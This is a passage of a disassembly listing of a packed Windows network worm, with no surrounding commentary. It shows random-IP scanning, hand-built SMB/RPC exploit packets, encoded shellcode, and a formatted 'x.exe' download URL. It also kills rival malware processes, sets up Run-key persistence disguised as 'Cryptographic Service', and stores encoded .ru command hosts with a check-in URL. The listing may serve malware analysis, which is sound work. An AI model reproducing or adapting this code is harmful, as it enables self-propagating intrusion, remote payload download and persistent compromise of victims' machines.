sub_3143278A+Cj pop ebp retn 4 sub_3143278A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432810 proc near ; DATA XREF: UPX0:314329E2o var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx call sub_314320B6 call sub_31432559 test eax, eax jnz loc_314328C9 push ebx mov ebx, dword_3143109C push esi mov esi, dword_314310FC push edi loc_31432836: ; CODE XREF: sub_31432810+48j ; sub_31432810+B0j call esi ; rand mov byte ptr [ebp+var_4+1], al call esi ; rand mov byte ptr [ebp+var_4+3], al call esi ; rand mov byte ptr [ebp+var_4+2], al loc_31432845: ; CODE XREF: sub_31432810+3Cj call esi ; rand cmp al, 7Fh mov byte ptr [ebp+var_4], al jz short loc_31432845 call sub_314321B4 mov edi, [ebp+var_4] cmp edi, eax jz short loc_31432836 call sub_314321F3 test eax, eax jz short loc_314328A1 push offset dword_31435044 call dword_314310D8 ; InterlockedIncrement push edi call sub_314319BC test eax, eax pop ecx jnz short loc_314328A8 push edi push offset sub_31432728 call sub_3143210D pop ecx mov [ebp+var_8], 4 pop ecx loc_3143288D: ; CODE XREF: sub_31432810+8Dj push edi push offset sub_3143278A call sub_3143210D dec [ebp+var_8] pop ecx pop ecx jnz short loc_3143288D jmp short loc_314328A8 ; --------------------------------------------------------------------------- loc_314328A1: ; CODE XREF: sub_31432810+51j push 2710h call ebx ; Sleep loc_314328A8: ; CODE XREF: sub_31432810+67j ; sub_31432810+8Fj call esi ; rand mov ecx, dword_3143504C xor edx, edx div ecx add edx, ecx push edx call ebx ; Sleep call sub_31432559 test eax, eax jz loc_31432836 pop edi pop esi pop ebx loc_314328C9: ; CODE XREF: sub_31432810+11j push 0 call dword_314310D4 ; ExitThread xor eax, eax leave retn 4 sub_31432810 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314328D7 proc near ; CODE XREF: UPX0:314329A7p ; UPX0:loc_31432A0Dp var_50 = byte ptr -50h var_28 = byte ptr -28h push ebp mov ebp, esp sub esp, 50h push esi call sub_314321B4 push eax call dword_31431160 ; inet_ntoa mov esi, dword_31431068 push eax lea eax, [ebp+var_28] push eax call esi ; lstrcpyA push dword_3143503C lea eax, [ebp+var_28] push eax lea eax, [ebp+var_50] push offset aHttpSDX_exe ; "http://%s:%d/x.exe" push eax call dword_31431120 ; wsprintfA add esp, 10h lea eax, [ebp+var_50] push eax push offset word_314342E2 call esi ; lstrcpyA push offset byte_314342E0 call dword_31431088 ; lstrlenA mov byte_314342E0[eax], 0DFh pop esi leave retn sub_314328D7 endp ; --------------------------------------------------------------------------- loc_31432933: ; DATA XREF: sub_3143256D+174o push ecx push ecx push ebx push ebp push esi xor ebx, ebx push edi mov dword_31435044, ebx call sub_314321F3 mov esi, dword_3143109C mov edi, 1388h test eax, eax jnz short loc_31432961 loc_31432955: ; CODE XREF: UPX0:3143295Fj push edi call esi ; Sleep call sub_314321F3 test eax, eax jz short loc_31432955 loc_31432961: ; CODE XREF: UPX0:31432953j lea eax, [esp+14h] push ebx push eax call dword_31431134 ; InternetGetConnectedState test byte ptr [esp+14h], 2 push 50h mov dword_31435048, ebx pop ebp mov dword_3143504C, 96h jz short loc_314329A0 mov dword_31435048, 1 mov ebp, 15Eh mov dword_3143504C, 14h loc_314329A0: ; CODE XREF: UPX0:31432985j call sub_314321B4 mov ebx, eax call sub_314328D7 cmp ebx, 100007Fh jz short loc_314329C1 push ebx push offset sub_31432728 call sub_3143210D pop ecx pop ecx loc_314329C1: ; CODE XREF: UPX0:314329B2j mov dword ptr [esp+10h], 4 loc_314329C9: ; CODE XREF: UPX0:314329DAj push ebx push offset sub_3143278A call sub_3143210D dec dword ptr [esp+18h] pop ecx pop ecx jnz short loc_314329C9 test ebp, ebp jle short loc_314329F1 loc_314329E0: ; CODE XREF: UPX0:314329EFj push 0 push offset sub_31432810 call sub_3143210D pop ecx dec ebp pop ecx jnz short loc_314329E0 loc_314329F1: ; CODE XREF: UPX0:314329DEj ; UPX0:314329FDj ... call sub_314321F3 test eax, eax jz short loc_314329FF push edi call esi ; Sleep jmp short loc_314329F1 ; --------------------------------------------------------------------------- loc_314329FF: ; CODE XREF: UPX0:314329F8j ; UPX0:31432A0Bj call sub_314321F3 test eax, eax jnz short loc_31432A0D push edi call esi ; Sleep jmp short loc_314329FF ; --------------------------------------------------------------------------- loc_31432A0D: ; CODE XREF: UPX0:31432A06j call sub_314328D7 jmp short loc_314329F1 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432A14 proc near ; CODE XREF: sub_31432BAD+93p ; sub_31432D2E+11Ap arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax push 0F003Fh push 0 push [ebp+arg_4] push [ebp+arg_0] call dword_3143100C ; RegOpenKeyExA test eax, eax jnz short loc_31432A47 push [ebp+arg_8] push [ebp+arg_4] call dword_31431010 ; RegDeleteValueA push [ebp+arg_4] call dword_31431014 ; RegCloseKey loc_31432A47: ; CODE XREF: sub_31432A14+1Cj pop ebp retn sub_31432A14 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432A49 proc near ; CODE XREF: sub_3143141F+28Ep ; sub_3143237F+33p ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push ecx mov eax, [ebp+arg_10] push esi mov [ebp+var_4], eax lea eax, [ebp+arg_10] push eax xor esi, esi push 0F003Fh push esi push [ebp+arg_4] push [ebp+arg_0] call dword_3143100C ; RegOpenKeyExA test eax, eax jz short loc_31432A75 push 1 pop eax jmp short loc_31432A9F ; --------------------------------------------------------------------------- loc_31432A75: ; CODE XREF: sub_31432A49+25j lea eax, [ebp+var_4] push eax lea eax, [ebp+arg_4] push [ebp+arg_C] push eax push esi push [ebp+arg_8] push [ebp+arg_10] call dword_31431008 ; RegQueryValueExA test eax, eax jz short loc_31432A94 push 2 pop esi loc_31432A94: ; CODE XREF: sub_31432A49+46j push [ebp+arg_10] call dword_31431014 ; RegCloseKey mov eax, esi loc_31432A9F: ; CODE XREF: sub_31432A49+2Aj pop esi leave retn sub_31432A49 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432AA2 proc near ; CODE XREF: sub_3143141F+306p ; sub_31432C62+96p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push esi xor esi, esi lea eax, [ebp+arg_4] push esi push eax push esi push 0F003Fh push esi push esi push esi push [ebp+arg_4] push [ebp+arg_0] call dword_31431000 ; RegCreateKeyExA test eax, eax jz short loc_31432ACB push 1 pop eax jmp short loc_31432AF2 ; --------------------------------------------------------------------------- loc_31432ACB: ; CODE XREF: sub_31432AA2+22j push [ebp+arg_10] push [ebp+arg_C] push 1 push esi push [ebp+arg_8] push [ebp+arg_4] call dword_31431004 ; RegSetValueExA test eax, eax jz short loc_31432AE7 push 2 pop esi loc_31432AE7: ; CODE XREF: sub_31432AA2+40j push [ebp+arg_4] call dword_31431014 ; RegCloseKey mov eax, esi loc_31432AF2: ; CODE XREF: sub_31432AA2+27j pop esi pop ebp retn sub_31432AA2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432AF5 proc near ; CODE XREF: sub_31432BAD+9Fp var_128 = dword ptr -128h var_120 = dword ptr -120h var_104 = byte ptr -104h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 128h push ebx mov ebx, [ebp+arg_0] push esi push ebx call dword_31431088 ; lstrlenA mov esi, eax dec esi test esi, esi jle loc_31432BA9 loc_31432B15: ; CODE XREF: sub_31432AF5+27j cmp byte ptr [esi+ebx], 5Ch jz short loc_31432B1E dec esi jns short loc_31432B15 loc_31432B1E: ; CODE XREF: sub_31432AF5+24j push 0 push 2 call sub_31432EFC ; CreateToolhelp32Snapshot cmp eax, 0FFFFFFFFh mov [ebp+arg_0], eax jz short loc_31432BA9 push 128h lea eax, [ebp+var_128] push 0 push eax call sub_31432EA6 ; memset add esp, 0Ch lea eax, [ebp+var_128] mov [ebp+var_128], 128h push eax push [ebp+arg_0] call sub_31432EF6 ; Process32First test eax, eax jz short loc_31432BA9 lea esi, [esi+ebx+1] loc_31432B66: ; CODE XREF: sub_31432AF5+B2j lea eax, [ebp+var_104] push eax push esi call dword_31431104 ; strstr pop ecx test eax, eax pop ecx jz short loc_31432B96 push [ebp+var_120] push 0 push 1F0FFFh call dword_314310B4 ; OpenProcess push 0 push eax call dword_31431060 ; TerminateProcess loc_31432B96: ; CODE XREF: sub_31432AF5+83j lea eax, [ebp+var_128] push eax push [ebp+arg_0] call sub_31432EF0 ; Process32Next test eax, eax jnz short loc_31432B66 loc_31432BA9: ; CODE XREF: sub_31432AF5+1Aj ; sub_31432AF5+38j ... pop esi pop ebx leave retn sub_31432AF5 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432BAD proc near ; CODE XREF: UPX0:31432536p var_13C = byte ptr -13Ch var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 13Ch push ebx push esi lea eax, [ebp+var_34] push edi mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager" mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter" mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service" mov [ebp+var_28], offset aBotLoader ; "Bot Loader" mov [ebp+var_24], offset aSystray ; "SysTray" mov [ebp+var_20], offset aWinupdate ; "WinUpdate" mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service" mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe" mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service" mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13" mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update" mov [ebp+var_4], eax mov [ebp+var_8], 0Bh mov edi, offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... mov esi, 80000002h loc_31432C1D: ; CODE XREF: sub_31432BAD+AEj mov eax, [ebp+var_4] push 104h mov ebx, [eax] lea eax, [ebp+var_13C] push eax push ebx push edi push esi call sub_31432A49 add esp, 14h test eax, eax jnz short loc_31432C54 push ebx push edi push esi call sub_31432A14 lea eax, [ebp+var_13C] push eax call sub_31432AF5 add esp, 10h loc_31432C54: ; CODE XREF: sub_31432BAD+8Ej add [ebp+var_4], 4 dec [ebp+var_8] jnz short loc_31432C1D pop edi pop esi pop ebx leave retn sub_31432BAD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432C62 proc near ; CODE XREF: sub_31432D2E+D1p ; sub_31432D2E+132p var_78 = byte ptr -78h var_14 = byte ptr -14h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 78h cmp [ebp+arg_0], 0 jz short loc_31432C77 push [ebp+arg_0] call dword_31431074 ; DeleteFileA loc_31432C77: ; CODE XREF: sub_31432C62+Aj lea eax, [ebp+var_78] push 63h push eax call dword_31431090 ; GetSystemDirectoryA test eax, eax jz locret_31432D2C push esi call dword_314310FC ; rand and eax, 3 add eax, 5 push eax lea eax, [ebp+var_14] push eax call sub_3143212E mov esi, dword_3143108C pop ecx pop ecx lea eax, [ebp+var_14] push offset dword_314341F0 push eax call esi ; lstrcatA lea eax, [ebp+var_78] push offset dword_314341F8 push eax call esi ; lstrcatA lea eax, [ebp+var_14] push eax lea eax, [ebp+var_78] push eax call esi ; lstrcatA lea eax, [ebp+var_78] push 0 push eax push [ebp+arg_4] call dword_31431050 ; CopyFileA lea eax, [ebp+var_78] push eax call dword_31431088 ; lstrlenA inc eax push eax lea eax, [ebp+var_78] push eax push offset aCryptographicS ; "Cryptographic Service" push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push 80000002h call sub_31432AA2 add esp, 14h push dword_31435034 call dword_31431080 ; CloseHandle lea eax, [ebp+var_78] push 0 push eax call dword_31431054 ; WinExec push 1F4h call dword_3143109C ; Sleep push 0 call dword_314310E4 ; ExitProcess pop esi locret_31432D2C: ; CODE XREF: sub_31432C62+23j leave retn sub_31432C62 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31432D2E proc near ; CODE XREF: UPX0:3143253Bp var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_20 = byte ptr -20h push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi lea eax, [ebp+var_84] push 63h push eax push 0 call dword_31431048 ; GetModuleFileNameA test eax, eax jz loc_31432E67 and dword_31435050, 0 lea eax, [ebp+var_20] push 1Dh push eax mov edi, offset aSoftwareMicr_1 ; "Software\\Microsoft\\Wireless" push offset aId ; "ID" mov esi, 80000002h push edi push esi call sub_31432A49 add esp, 14h test eax, eax jz short loc_31432DB4 call dword_314310FC ; rand push 0Ah mov ebx, offset aKtgvjlfibo ; "ktgvjlfibo" cdq pop ecx idiv ecx add edx, ecx push edx push ebx call sub_3143212E pop ecx pop ecx push ebx call dword_31431088 ; lstrlenA inc eax push eax push ebx push offset aId ; "ID" push edi push esi call sub_31432AA2 add esp, 14h jmp short loc_31432DC3 ; --------------------------------------------------------------------------- loc_31432DB4: ; CODE XREF: sub_31432D2E+4Dj lea eax, [ebp+var_20] push eax push offset aKtgvjlfibo ; "ktgvjlfibo" call dword_31431068 ; lstrcpyA loc_31432DC3: ; CODE XREF: sub_31432D2E+84j lea eax, [ebp+var_E8] push 63h push eax push offset aCryptographicS ; "Cryptographic Service" push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push esi call sub_31432A49 add esp, 14h test eax, eax jz short loc_31432E09 push 2 push offset a1 ; "1" push offset aClient ; "Client" push edi push esi call sub_31432AA2 lea eax, [ebp+var_84] push eax push 0 call sub_31432C62 add esp, 1Ch jmp short loc_31432E67 ; --------------------------------------------------------------------------- loc_31432E09: ; CODE XREF: sub_31432D2E+B3j lea eax, [ebp+var_84] push eax lea eax, [ebp+var_E8] push eax call dword_3143104C ; lstrcmpiA test eax, eax jnz short loc_31432E52 lea eax, [ebp+var_20] push 1Dh mov ebx, offset aClient ; "Client" push eax push ebx push edi push esi call sub_31432A49 add esp, 14h test eax, eax jnz short loc_31432E67 push ebx push edi push esi mov dword_31435050, 1 call sub_31432A14 add esp, 0Ch jmp short loc_31432E67 ; --------------------------------------------------------------------------- loc_31432E52: ; CODE XREF: sub_31432D2E+F1j lea eax, [ebp+var_84] push eax lea eax, [ebp+var_E8] push eax call sub_31432C62 pop ecx pop ecx loc_31432E67: ; CODE XREF: sub_31432D2E+1Fj ; sub_31432D2E+D9j ... pop edi pop esi pop ebx leave retn sub_31432D2E endp ; =============== S U B R O U T I N E ======================================= sub_31432E6C proc near ; CODE XREF: sub_314311A0+CAp ; sub_31431782+11p ... arg_0 = dword ptr 4 push 4 push 1000h push [esp+8+arg_0] push 0 call dword_31431044 ; VirtualAlloc retn sub_31432E6C endp ; =============== S U B R O U T I N E ======================================= sub_31432E80 proc near ; CODE XREF: sub_314311A0+10Bp ; sub_31431782+C0p arg_0 = dword ptr 4 push 8000h push 0 push [esp+8+arg_0] call dword_31431040 ; VirtualFree retn sub_31432E80 endp ; --------------------------------------------------------------------------- align 10h loc_31432EA0: ; DATA XREF: sub_3143141F+Ao ; sub_3143256D+Ao jmp dword ptr loc_31431100 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EA6 proc near ; CODE XREF: sub_314319BC+128p ; sub_314319BC+134p ... jmp dword_314310F8 sub_31432EA6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EAC proc near ; CODE XREF: sub_314319BC+9Cp ; sub_314319BC+C5p ... jmp dword_314310F4 sub_31432EAC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EB2 proc near ; CODE XREF: sub_314319BC+93p ; sub_314319BC+B2p ... jmp dword_314310F0 sub_31432EB2 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_31432EC0 proc near ; CODE XREF: sub_314319BC+8p arg_0 = byte ptr 4 push ecx cmp eax, 1000h lea ecx, [esp+4+arg_0] jb short loc_31432EE0 loc_31432ECC: ; CODE XREF: sub_31432EC0+1Ej sub ecx, 1000h sub eax, 1000h test [ecx], eax cmp eax, 1000h jnb short loc_31432ECC loc_31432EE0: ; CODE XREF: sub_31432EC0+Aj sub ecx, eax mov eax, esp test [ecx], eax mov esp, ecx mov ecx, [eax] mov eax, [eax+4] push eax retn sub_31432EC0 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EF0 proc near ; CODE XREF: sub_31432AF5+ABp jmp dword_31431064 sub_31432EF0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EF6 proc near ; CODE XREF: sub_31432AF5+64p jmp dword_3143105C sub_31432EF6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31432EFC proc near ; CODE XREF: sub_31432AF5+2Dp jmp dword_31431058 sub_31432EFC endp ; --------------------------------------------------------------------------- db 2 dup(0CCh) dd 43Fh dup(0) dword_31434000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h ; DATA XREF: sub_3143141F+11Do ; sub_3143141F+20Fo dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h dd 3072657Ah, 0 aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_31431782+84o align 10h byte_31434080 db 0 ; DATA XREF: sub_3143185D+1Br off_31434081 dd offset dword_314341E4 ; DATA XREF: sub_3143185D+23r align 2 dd offset dword_314341D4 dw 0C401h dd 1314341h, 314341B4h, 4341A000h, 41900131h, 80013143h dd 314341h, 31434174h, 43416800h, 41580131h, 48003143h dd 1314341h, 3143413Ch, 43417400h, 41D40131h, 30003143h dd 314341h, 314341D4h, 43412001h, 41480031h, 10013143h dd 314341h, 31434130h, 43410001h, 40F80131h, 74003143h dd 314341h, 31434130h, 2E767663h, 7572h, 2E777777h, 6C646572h dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh dd 782D7265h, 6D6F632Eh, 0 dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0 dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh dd 75722E6Bh, 0 dword_314341D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314341E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314341F0 dd 6578652Eh, 0 ; sub_31432239+55o ... dword_314341F8 dd 5Ch ; sub_31432C62+56o aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_314311A0+13o align 10h aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31431313+1Co align 4 aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31431313+Co align 4 aD db '%d',0 ; DATA XREF: sub_3143141F+2CCo align 4 dword_3143426C dd 444952h aSoftwareMicros db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_3143141F+259o aZer1 db 'zer1',0 ; DATA XREF: sub_3143141F:loc_314315B7o align 4 aZer0 db 'zer0',0 ; DATA XREF: sub_3143141F+34o align 4 aHttpS db 'http://%s',0 ; DATA XREF: sub_31431782+71o align 4 aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=20&cnt=%s',0 ; DATA XREF: sub_31431782+57o align 10h byte_314342E0 db 0EBh ; DATA XREF: sub_314319BC+24Eo ; sub_314319BC+260o ... db 58h word_314342E2 dw 7468h ; DATA XREF: sub_314328D7+40o dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h) dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh dd 0 dword_314345A8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_314319BC+186o dd 0FEFF0000h, 0 dd 2006200h aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0 db 2 db 4Ch ; L db 41h, 4Eh, 4Dh db 41h ; A db 4Eh, 31h, 2Eh db 30h ; 0 align 2 dw 5702h aIndowsForWorkg db 'indows for Workgroups 3.1a',0 db 2 dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh dd 544E0200h, 204D4C20h, 32312E30h, 0 dword_31434634 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+1BAo dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0 dd 20000000h, 0 dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h dd 4 dup(0) aWindows2000219: unicode 0, <Windows 2000 2195>,0 aWindows20005_0: unicode 0, <Windows 2000 5.0>,0 align 10h dword_314346E0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+1EEo dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0 dd 57000000h, 0 dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h dd 0 dd 47000000h, 0 dd 40000000h, 0 dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h dd 2E0035h, 30h, 0 dword_314347C0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+8Do dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h dd 5C0030h, 500049h aC: ; DATA XREF: sub_314319BC+BFo unicode 0, <C$>,0 a????? db '?????',0 dd 0 dword_31434824 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+2D4o dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0 dd 2019Fh, 3 dup(0) dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h dd 0 dword_31434890 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+308o dd 4DC0800h, 500800h, 48000010h, 0 dd 4, 2 dup(0) dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h dd 5C0045h, 0 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh dd 0 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0 dword_31434934 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+4EEo dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0) dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h dd 5C0045h, 0 dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0 dd 3ECh, 0 dword_314349B4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 138578h, 0E9A65BABh, 0 dword_31434A48 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+347o dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h dd 8FFFFFFh, 10B800h, 4010B800h, 0 dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h dd 0DADh, 0 dd 0DADh, 0 dword_31434AB4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_314319BC+372o dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0) dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h dd 5C0045h, 0 dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0 dword_31434B28 dd 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 3 dup(0) dd 586E6957h, 72502050h, 6Fh, 9 dup(0) db 2 dup(0) dword_31434BE6 dd 1004600h dw 1 dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0) dword_31434C20 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0) ; DATA XREF: sub_314319BC+41Bo ; sub_314319BC+45Do dd 123C0000h, 751Ch, 0Eh dup(0) ; --------------------------------------------------------------------------- loc_31434C98: ; DATA XREF: sub_314319BC+44Ao jmp short loc_31434CA0 ; --------------------------------------------------------------------------- jmp short loc_31434CA2 ; --------------------------------------------------------------------------- align 10h loc_31434CA0: ; CODE XREF: UPX0:loc_31434C98j ; DATA XREF: sub_314319BC+5Co pop esp pop esp loc_31434CA2: 